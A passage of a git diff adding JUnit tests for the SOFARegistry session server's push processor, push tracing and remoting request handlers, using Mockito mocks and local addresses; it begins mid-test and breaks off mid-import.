Assert.assertEquals(processor.pendingTasks.size(), 1, 0); + + // fire after + Assert.assertEquals(PENDING_REPLACE_COUNTER.get(), 0, 0); + datum = TestUtils.newSubDatum(subscriber.getDataId(), 200, Collections.emptyList()); + processor.firePush( + pushCause, + NetUtil.getLocalSocketAddress(), + Collections.singletonMap(subscriber.getRegisterId(), subscriber), + datum); + Assert.assertEquals(PENDING_REPLACE_COUNTER.get(), 1, 0); + Assert.assertEquals(processor.pendingTasks.size(), 1, 0); + PushProcessor.PushTask replaceTask = processor.pendingTasks.get(taskKey); + Assert.assertNotEquals(replaceTask, task); + // replace.task expire set to prev.expire + Assert.assertEquals(replaceTask.expireTimestamp, task.expireTimestamp); + Assert.assertTrue(replaceTask.toString(), replaceTask.toString().contains(dataId)); + + // now there is one pending task with noDelay + processor.sessionServerConfig.setStopPushSwitch(true); + Assert.assertEquals(processor.watchCommit().size(), 0); + + processor.sessionServerConfig.setStopPushSwitch(false); + // pushExecutor not init, commit failed + Assert.assertEquals(processor.watchCommit().size(), 0); + // first suspend, avoid run watchdog + processor.watchDog.suspend(); + // pushExecutor init + processor.init(); + // push again + // noDelay=true + processor.firePush( + pushCause, + NetUtil.getLocalSocketAddress(), + Collections.singletonMap(subscriber.getRegisterId(), subscriber), + datum); + + // noDelay=false + processor.firePush( + new PushCause(System.currentTimeMillis(), PushType.Sub, System.currentTimeMillis()), + NetUtil.getLocalSocketAddress(), + Collections.singletonMap(subscriber.getRegisterId() + "-test", subscriber), + datum); + Assert.assertEquals(processor.pendingTasks.size(), 2); + // only one, sub is not expire + List commits = processor.watchCommit(); + Assert.assertEquals(commits.size(), 1); + Assert.assertEquals(processor.watchCommit().size(), 0); + Assert.assertEquals(processor.pendingTasks.size(), 1); + + task = processor.pendingTasks.values().iterator().next(); + Assert.assertEquals(task.pushCause.pushType, PushType.Sub); + // make task expire + task.expireTimestamp = System.currentTimeMillis(); + + commits = processor.watchCommit(); + Assert.assertEquals(commits.size(), 1); + Assert.assertEquals(processor.watchCommit().size(), 0); + Assert.assertEquals(processor.pendingTasks.size(), 0); + + processor.watchDog.resume(); + } + + @Test + public void testPush() throws Exception { + PushProcessor processor = new PushProcessor(); + SessionServerConfigBean config = TestUtils.newSessionConfig("testDc"); + processor.sessionServerConfig = config; + processor.pushDataGenerator = new PushDataGenerator(); + processor.pushDataGenerator.sessionServerConfig = config; + + PushCause pushCause = + new PushCause(System.currentTimeMillis(), PushType.Reg, System.currentTimeMillis()); + Subscriber subscriber = TestUtils.newZoneSubscriber(dataId, zone); + SubDatum datum = TestUtils.newSubDatum(subscriber.getDataId(), 100, Collections.emptyList()); + + processor.firePush( + pushCause, + NetUtil.getLocalSocketAddress(), + Collections.singletonMap(subscriber.getRegisterId(), subscriber), + datum); + + PushProcessor.PushTask task = processor.pendingTasks.values().iterator().next(); + processor.pendingTasks.clear(); + + processor.sessionServerConfig.setStopPushSwitch(true); + Assert.assertFalse(processor.doPush(task)); + + processor.sessionServerConfig.setStopPushSwitch(false); + // clientNodeService is null + Assert.assertFalse(processor.doPush(task)); + Assert.assertEquals(processor.pushingTasks.size(), 0); + + processor.clientNodeService = Mockito.mock(ClientNodeService.class); + // push success + Assert.assertTrue(processor.doPush(task)); + + Mockito.verify(processor.clientNodeService, Mockito.times(1)) + .pushWithCallback(Mockito.anyObject(), Mockito.anyObject(), Mockito.anyObject()); + Assert.assertEquals(processor.pushingTasks.size(), 1); + + PushProcessor.PushTask pushing = processor.pushingTasks.values().iterator().next(); + Assert.assertEquals(pushing, task); + PushProcessor.PushingTaskKey pushingKey = processor.pushingTasks.keySet().iterator().next(); + Assert.assertTrue(pushingKey.toString(), pushingKey.toString().contains(dataId)); + PushProcessor.PushingTaskKey otherPushingKey = + new PushProcessor.PushingTaskKey( + pushingKey.dataInfoId, + pushingKey.addr, + pushingKey.scopeEnum, + BaseInfo.ClientVersion.MProtocolpackage); + + Assert.assertNotEquals(pushingKey, otherPushingKey); + + // make sure check pushing success + config.setClientNodeExchangeTimeoutMillis(1000 * 30); + // no retry + config.setPushTaskRetryTimes(0); + Assert.assertFalse(processor.doPush(task)); + Assert.assertEquals(processor.pendingTasks.size(), 0); + Assert.assertEquals(task.retryCount, 1); + + // support retry + config.setPushTaskRetryTimes(1); + task.retryCount = 0; + long expire = task.expireTimestamp; + long now1 = System.currentTimeMillis(); + Assert.assertFalse(processor.doPush(task)); + // has add pending + Assert.assertEquals(processor.pendingTasks.size(), 1); + TestUtils.assertBetween( + task.expireTimestamp, + now1 + processor.getRetryBackoffTime(1), + System.currentTimeMillis() + processor.getRetryBackoffTime(1)); + + // expire has update + Assert.assertNotEquals(task.expireTimestamp, expire); + Assert.assertEquals(processor.pushingTasks.size(), 1); + // push too long, trigger force push + config.setClientNodeExchangeTimeoutMillis(0); + Thread.sleep(1); + Assert.assertTrue(processor.checkPushing(task)); + Assert.assertEquals(processor.pushingTasks.size(), 0); + + Assert.assertTrue(processor.doPush(task)); + Assert.assertEquals(processor.pushingTasks.size(), 1); + // task has clean + processor.handleDoPushException(task, new RequestChannelClosedException("test")); + Assert.assertEquals(processor.pushingTasks.size(), 0); + + Assert.assertTrue(processor.doPush(task)); + Assert.assertEquals(processor.pushingTasks.size(), 1); + // task has clean + processor.handleDoPushException(task, new Throwable("test")); + Assert.assertEquals(processor.pushingTasks.size(), 0); + } + + @Test + public void testGetRetry() { + PushProcessor processor = new PushProcessor(); + SessionServerConfigBean config = TestUtils.newSessionConfig("testDc"); + processor.sessionServerConfig = config; + Assert.assertEquals( + processor.getRetryBackoffTime(0), config.getPushDataTaskRetryFirstDelayMillis()); + Assert.assertEquals( + processor.getRetryBackoffTime(1), config.getPushDataTaskRetryFirstDelayMillis()); + Assert.assertEquals( + processor.getRetryBackoffTime(2), + config.getPushDataTaskRetryFirstDelayMillis() + + config.getPushDataTaskRetryIncrementDelayMillis()); + } + + @Test + public void testRun() { + PushProcessor.DiscardRunHandler discardRunHandler = new PushProcessor.DiscardRunHandler(); + Thread t = Thread.currentThread(); + final AtomicReference runT = new AtomicReference<>(); + discardRunHandler.rejectedExecution( + new Runnable() { + @Override + public void run() { + runT.set(Thread.currentThread()); + } + }, + (ThreadPoolExecutor) Executors.newCachedThreadPool()); + Assert.assertNull(runT.get()); + } + + @Test + public void testOnCallback() throws Exception { + PushProcessor processor = newProcessor(); + PushCause pushCause = + new PushCause(System.currentTimeMillis(), PushType.Reg, System.currentTimeMillis()); + Subscriber subscriber = TestUtils.newZoneSubscriber(dataId, zone); + SubDatum datum = TestUtils.newSubDatum(subscriber.getDataId(), 100, Collections.emptyList()); + + processor.firePush( + pushCause, + NetUtil.getLocalSocketAddress(), + Collections.singletonMap(subscriber.getRegisterId(), subscriber), + datum); + + PushProcessor.PushTask task = processor.pendingTasks.values().iterator().next(); + processor.doPush(task); + Thread.sleep(1); + Assert.assertEquals(processor.pushingTasks.size(), 1); + PushProcessor.PushClientCallback callback = processor.new PushClientCallback(task); + Assert.assertNotNull(callback.getExecutor()); + Assert.assertEquals(0, subscriber.getPushVersion(datum.getDataCenter())); + Assert.assertEquals(0, callback.finishedTimestamp); + callback.onCallback(null, null); + // pushing task cleaned + Assert.assertEquals(processor.pushingTasks.size(), 0); + Assert.assertNotEquals(0, callback.finishedTimestamp); + Assert.assertEquals(100, subscriber.getPushVersion(datum.getDataCenter())); + Assert.assertTrue(String.valueOf(callback.pushSpanMillis()), callback.pushSpanMillis() > 0); + Assert.assertTrue(String.valueOf(callback.totalSpanMillis()), callback.totalSpanMillis() > 0); + } + + private PushProcessor newProcessor() { + PushProcessor processor = new PushProcessor(); + SessionServerConfigBean config = TestUtils.newSessionConfig("testDc"); + processor.sessionServerConfig = config; + processor.clientNodeService = Mockito.mock(ClientNodeService.class); + processor.pushDataGenerator = new PushDataGenerator(); + processor.pushDataGenerator.sessionServerConfig = config; + return processor; + } + + @Test + public void testOnException() throws Exception { + PushProcessor processor = newProcessor(); + + PushCause pushCause = + new PushCause(System.currentTimeMillis(), PushType.Reg, System.currentTimeMillis()); + Subscriber subscriber = TestUtils.newZoneSubscriber(dataId, zone); + SubDatum datum = TestUtils.newSubDatum(subscriber.getDataId(), 100, Collections.emptyList()); + + processor.firePush( + pushCause, + NetUtil.getLocalSocketAddress(), + Collections.singletonMap(subscriber.getRegisterId(), subscriber), + datum); + + PushProcessor.PushTask task = processor.pendingTasks.values().iterator().next(); + processor.doPush(task); + Thread.sleep(1); + Assert.assertEquals(processor.pushingTasks.size(), 1); + PushProcessor.PushClientCallback callback = processor.new PushClientCallback(task); + Assert.assertNotNull(callback.getExecutor()); + Assert.assertEquals(0, subscriber.getPushVersion(datum.getDataCenter())); + Assert.assertEquals(0, callback.finishedTimestamp); + + callback.onException(null, new InvokeTimeoutException()); + Assert.assertEquals(PUSH_CLIENT_FAIL_COUNTER.get(), 1, 0); + Assert.assertEquals(processor.pushingTasks.size(), 0); + Assert.assertNotEquals(0, callback.finishedTimestamp); + Assert.assertEquals(0, subscriber.getPushVersion(datum.getDataCenter())); + Assert.assertTrue(callback.pushSpanMillis() > 0); + Assert.assertTrue(callback.totalSpanMillis() > 0); + + callback.onException(null, new Exception()); + Assert.assertEquals(PUSH_CLIENT_FAIL_COUNTER.get(), 2, 0); + Assert.assertEquals(processor.pushingTasks.size(), 0); + Assert.assertEquals(0, subscriber.getPushVersion(datum.getDataCenter())); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/push/PushTraceTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/push/PushTraceTest.java new file mode 100644 index 000000000..f33c66309 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/push/PushTraceTest.java @@ -0,0 +1,97 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.push; + +import com.alipay.sofa.registry.common.model.store.SubDatum; +import com.alipay.sofa.registry.common.model.store.SubPublisher; +import com.alipay.sofa.registry.net.NetUtil; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import com.google.common.collect.Lists; +import java.util.Collections; +import java.util.List; +import org.junit.Assert; +import org.junit.Test; + +public class PushTraceTest { + + @Test + public void test() throws Exception { + List list = Lists.newArrayList(); + list.add(TestUtils.newSubPublisher(0, System.currentTimeMillis())); + Thread.sleep(5); + final long middle = DatumVersionUtil.nextId(); + Thread.sleep(5); + list.add(TestUtils.newSubPublisher(0, System.currentTimeMillis())); + Thread.sleep(5); + list.add(TestUtils.newSubPublisher(0, System.currentTimeMillis())); + + SubDatum subDatum = TestUtils.newSubDatum("testDataId", DatumVersionUtil.nextId(), list); + long now1 = System.currentTimeMillis(); + PushTrace trace = + PushTrace.trace( + subDatum, + NetUtil.getLocalSocketAddress(), + "subApp", + new PushCause(now1, PushType.Sub, now1), + 1, + System.currentTimeMillis() - 100); + long now2 = System.currentTimeMillis(); + + // new.sub=2 + trace.startPush(middle, now2); + long finish = now2 + 100; + trace.finishPush(PushTrace.PushStatus.OK, finish); + + trace.print(); + + Assert.assertEquals(trace.datumTotalDelayMillis, finish - trace.pushCause.triggerTimestamp); + Assert.assertEquals( + trace.datumPushCommitSpanMillis, + trace.pushCommitTimestamp - trace.pushCause.triggerTimestamp); + Assert.assertEquals(trace.datumPushStartSpanMillis, now2 - trace.pushCommitTimestamp); + Assert.assertEquals(trace.datumPushFinishSpanMillis, finish - now2); + + Assert.assertEquals(trace.newPublisherNum, 2); + Assert.assertEquals(trace.firstPubPushDelayMillis, finish - list.get(1).getRegisterTimestamp()); + Assert.assertEquals(trace.lastPubPushDelayMillis, finish - list.get(2).getRegisterTimestamp()); + } + + @Test + public void testFind() { + Assert.assertTrue(PushTrace.findNewPublishers(Collections.emptyList(), 100).isEmpty()); + + List list = Lists.newArrayList(); + list.add(TestUtils.newSubPublisher(0, 100)); + list.add(TestUtils.newSubPublisher(0, 200)); + list.add(TestUtils.newSubPublisher(0, 50)); + + List find = PushTrace.findNewPublishers(list, 10); + Assert.assertEquals(3, find.size()); + Assert.assertEquals(find.get(0).getRegisterTimestamp(), 50); + Assert.assertEquals(find.get(1).getRegisterTimestamp(), 100); + Assert.assertEquals(find.get(2).getRegisterTimestamp(), 200); + + find = PushTrace.findNewPublishers(list, 80); + Assert.assertEquals(2, find.size()); + Assert.assertEquals(find.get(0).getRegisterTimestamp(), 100); + Assert.assertEquals(find.get(1).getRegisterTimestamp(), 200); + + find = PushTrace.findNewPublishers(list, 200); + Assert.assertEquals(0, find.size()); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/CancelAddressRequestHandlerTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/CancelAddressRequestHandlerTest.java new file mode 100644 index 000000000..e9faf7194 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/CancelAddressRequestHandlerTest.java @@ -0,0 +1,71 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.ConnectId; +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.sessionserver.CancelAddressRequest; +import com.alipay.sofa.registry.core.model.Result; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.session.registry.Registry; +import java.util.List; +import org.assertj.core.util.Lists; +import org.junit.Assert; +import org.junit.Test; + +public class CancelAddressRequestHandlerTest { + @Test + public void testCheckParam() { + CancelAddressRequestHandler handler = newHandler(); + handler.checkParam(request()); + } + + private CancelAddressRequestHandler newHandler() { + CancelAddressRequestHandler handler = new CancelAddressRequestHandler(); + Assert.assertNull(handler.getExecutor()); + Assert.assertEquals(handler.interest(), CancelAddressRequest.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.CLIENT); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + Result failed = (Result) handler.buildFailedResponse("msg"); + Assert.assertFalse(failed.isSuccess()); + return handler; + } + + @Test + public void testHandle() { + CancelAddressRequestHandler handler = newHandler(); + handler.sessionRegistry = mock(Registry.class); + Result result = (Result) handler.doHandle(null, request()); + Assert.assertTrue(result.isSuccess()); + verify(handler.sessionRegistry, times(1)).cancel(anyList()); + } + + private static CancelAddressRequest request() { + List list = Lists.newArrayList(ConnectId.of("127.0.0.1:1111", "127.0.0.1:2222")); + CancelAddressRequest request = new CancelAddressRequest(list); + Assert.assertTrue(request.toString(), request.toString().contains("127.0.0.1:111")); + + CancelAddressRequest request2 = new CancelAddressRequest(); + request2.setConnectIds(list); + Assert.assertEquals(request.getConnectIds(), request2.getConnectIds()); + + return request; + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/ClientNodeConnectionHandlerTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/ClientNodeConnectionHandlerTest.java new file mode 100644 index 000000000..a36e3f69b --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/ClientNodeConnectionHandlerTest.java @@ -0,0 +1,53 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import static org.mockito.Matchers.anyList; +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.session.registry.Registry; +import org.junit.Assert; +import org.junit.Test; + +public class ClientNodeConnectionHandlerTest { + + private ClientNodeConnectionHandler newHandler() { + ClientNodeConnectionHandler handler = new ClientNodeConnectionHandler(); + Assert.assertNull(handler.getExecutor()); + Assert.assertEquals(handler.interest(), null); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.CLIENT); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.LISTENER); + TestUtils.assertRunException(RuntimeException.class, () -> handler.buildFailedResponse("msg")); + return handler; + } + + @Test + public void testHandle() { + ClientNodeConnectionHandler handler = newHandler(); + handler.sessionRegistry = mock(Registry.class); + handler.executorManager = new ExecutorManager(TestUtils.newSessionConfig("testDc")); + Channel channel = TestUtils.newChannel(9600, "127.0.0.1", 9888); + handler.cancel(channel); + verify(handler.sessionRegistry, times(1)).cancel(anyList()); + handler.disconnected(channel); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/DataChangeRequestHandlerTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/DataChangeRequestHandlerTest.java new file mode 100644 index 000000000..481a6d31d --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/DataChangeRequestHandlerTest.java @@ -0,0 +1,87 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; +import com.alipay.sofa.registry.common.model.sessionserver.DataChangeRequest; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfigBean; +import com.alipay.sofa.registry.server.session.push.FirePushService; +import com.alipay.sofa.registry.server.session.store.Interests; +import java.util.HashMap; +import java.util.Map; +import org.junit.Assert; +import org.junit.Test; + +public class DataChangeRequestHandlerTest { + @Test + public void testCheckParam() { + DataChangeRequestHandler handler = newHandler(); + handler.checkParam(request()); + } + + private DataChangeRequestHandler newHandler() { + DataChangeRequestHandler handler = new DataChangeRequestHandler(); + Assert.assertEquals(handler.interest(), DataChangeRequest.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.DATA); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + return handler; + } + + @Test + public void testHandle() { + DataChangeRequestHandler handler = newHandler(); + SessionServerConfigBean serverConfigBean = TestUtils.newSessionConfig("testDc"); + handler.sessionServerConfig = serverConfigBean; + handler.executorManager = new ExecutorManager(serverConfigBean); + handler.firePushService = mock(FirePushService.class); + handler.sessionInterests = mock(Interests.class); + + handler.sessionServerConfig.setStopPushSwitch(true); + // no npe, stopPush skip the handle + Object obj = handler.doHandle(null, null); + Assert.assertNull(obj); + + handler.sessionServerConfig.setStopPushSwitch(false); + when(handler.sessionInterests.checkInterestVersion(anyString(), anyString(), anyLong())) + .thenReturn(Interests.InterestVersionCheck.Obsolete); + obj = handler.doHandle(null, request()); + Assert.assertNull(obj); + verify(handler.firePushService, times(0)).fireOnChange(anyString(), anyString(), anyLong()); + + when(handler.sessionInterests.checkInterestVersion(anyString(), anyString(), anyLong())) + .thenReturn(Interests.InterestVersionCheck.Interested); + obj = handler.doHandle(null, request()); + Assert.assertNull(obj); + verify(handler.firePushService, times(2)).fireOnChange(anyString(), anyString(), anyLong()); + } + + private static DataChangeRequest request() { + Map dataInfoIds = new HashMap<>(); + dataInfoIds.put("testId1", new DatumVersion(100)); + dataInfoIds.put("testId2", new DatumVersion(200)); + DataChangeRequest request = new DataChangeRequest("testDc", dataInfoIds); + Assert.assertTrue(request.toString(), request.toString().contains("testDc")); + return request; + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/DataPushRequestHandlerTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/DataPushRequestHandlerTest.java new file mode 100644 index 000000000..b2397cb1b --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/DataPushRequestHandlerTest.java @@ -0,0 +1,88 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import static org.mockito.Matchers.anyLong; +import static org.mockito.Matchers.anyString; +import static org.mockito.Mockito.*; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.sessionserver.DataPushRequest; +import com.alipay.sofa.registry.common.model.store.SubDatum; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfigBean; +import com.alipay.sofa.registry.server.session.push.FirePushService; +import java.util.Collections; +import org.junit.Assert; +import org.junit.Test; + +public class DataPushRequestHandlerTest { + @Test + public void testCheckParam() { + DataPushRequestHandler handler = newHandler(); + handler.checkParam(request()); + } + + private DataPushRequestHandler newHandler() { + DataPushRequestHandler handler = new DataPushRequestHandler(); + Assert.assertEquals(handler.interest(), DataPushRequest.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.DATA); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + return handler; + } + + @Test + public void testHandle() { + DataPushRequestHandler handler = newHandler(); + SessionServerConfigBean serverConfigBean = TestUtils.newSessionConfig("testDc"); + handler.sessionServerConfig = serverConfigBean; + handler.executorManager = new ExecutorManager(serverConfigBean); + Assert.assertNotNull(handler.getExecutor()); + + handler.sessionServerConfig.setStopPushSwitch(true); + // no npe, stopPush skip the handle + Object obj = handler.doHandle(null, null); + Assert.assertNull(obj); + + handler.sessionServerConfig.setStopPushSwitch(false); + // npe + TestUtils.assertRunException(RuntimeException.class, () -> handler.doHandle(null, request())); + handler.firePushService = mock(FirePushService.class); + obj = handler.doHandle(null, request()); + Assert.assertNull(obj); + verify(handler.firePushService, times(0)).fireOnChange(anyString(), anyString(), anyLong()); + } + + private static DataPushRequest request() { + SubDatum subDatum = + new SubDatum( + "dataInfoId", + "dataCenter", + 100, + Collections.emptyList(), + "testDataId", + "testInstanceId", + "testGroup"); + DataPushRequest request = new DataPushRequest(subDatum); + Assert.assertTrue(request.toString(), request.toString().contains("dataInfoId")); + Assert.assertEquals(request.getDatum(), subDatum); + return request; + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/DataSlotDiffDigestRequestHandlerTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/DataSlotDiffDigestRequestHandlerTest.java new file mode 100644 index 000000000..def7ab497 --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/DataSlotDiffDigestRequestHandlerTest.java @@ -0,0 +1,85 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import static org.mockito.Matchers.anyInt; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.dataserver.DatumDigest; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffDigestRequest; +import com.alipay.sofa.registry.common.model.slot.DataSlotDiffDigestResult; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.server.session.TestUtils; +import com.alipay.sofa.registry.server.session.bootstrap.ExecutorManager; +import com.alipay.sofa.registry.server.session.slot.SlotTableCache; +import com.alipay.sofa.registry.server.session.store.DataStore; +import java.util.Collections; +import java.util.Map; +import org.junit.Assert; +import org.junit.Test; + +public class DataSlotDiffDigestRequestHandlerTest { + + @Test + public void testCheckParam() { + DataSlotDiffDigestRequestHandler handler = newHandler(); + handler.checkParam(request(1, null)); + handler.checkParam(request(1, Collections.emptyMap())); + } + + private DataSlotDiffDigestRequestHandler newHandler() { + DataSlotDiffDigestRequestHandler handler = new DataSlotDiffDigestRequestHandler(); + handler.executorManager = new ExecutorManager(TestUtils.newSessionConfig("testDc")); + Assert.assertNotNull(handler.getExecutor()); + Assert.assertEquals(handler.interest(), DataSlotDiffDigestRequest.class); + Assert.assertEquals(handler.getConnectNodeType(), Node.NodeType.DATA); + Assert.assertEquals(handler.getType(), ChannelHandler.HandlerType.PROCESSER); + Assert.assertEquals(handler.getInvokeType(), ChannelHandler.InvokeType.SYNC); + GenericResponse failed = (GenericResponse) handler.buildFailedResponse("msg"); + Assert.assertFalse(failed.isSuccess()); + return handler; + } + + @Test + public void testHandle() { + DataSlotDiffDigestRequestHandler handler = newHandler(); + handler.slotTableCache = mock(SlotTableCache.class); + TestUtils.MockBlotChannel channel = TestUtils.newChannel(9620, "localhost", 8888); + + DataSlotDiffDigestRequest request = request(1, Collections.emptyMap()); + // npe + GenericResponse resp = (GenericResponse) handler.doHandle(channel, request); + Assert.assertFalse(resp.isSuccess()); + Assert.assertNull(resp.getData()); + + handler.sessionDataStore = mock(DataStore.class); + when(handler.sessionDataStore.getDataInfoIdPublishers(anyInt())) + .thenReturn(Collections.emptyMap()); + resp = (GenericResponse) handler.doHandle(channel, request); + Assert.assertTrue(resp.isSuccess()); + Assert.assertNotNull(resp.getData()); + Assert.assertTrue(resp.getData() instanceof DataSlotDiffDigestResult); + } + + private static DataSlotDiffDigestRequest request( + int slotId, Map datumDigest) { + return new DataSlotDiffDigestRequest(1, slotId, datumDigest); + } +} diff --git a/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/DataSlotDiffPublisherRequestHandlerTest.java b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/DataSlotDiffPublisherRequestHandlerTest.java new file mode 100644 index 000000000..0fe5bd4fa --- /dev/null +++ b/server/server/session/src/test/java/com/alipay/sofa/registry/server/session/remoting/handler/DataSlotDiffPublisherRequestHandlerTest.java @@ -0,0 +1,86 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.remoting.handler; + +import static org.mockito.Matchers.anyInt; +import static org.mockito.Mockito.mock; +import static 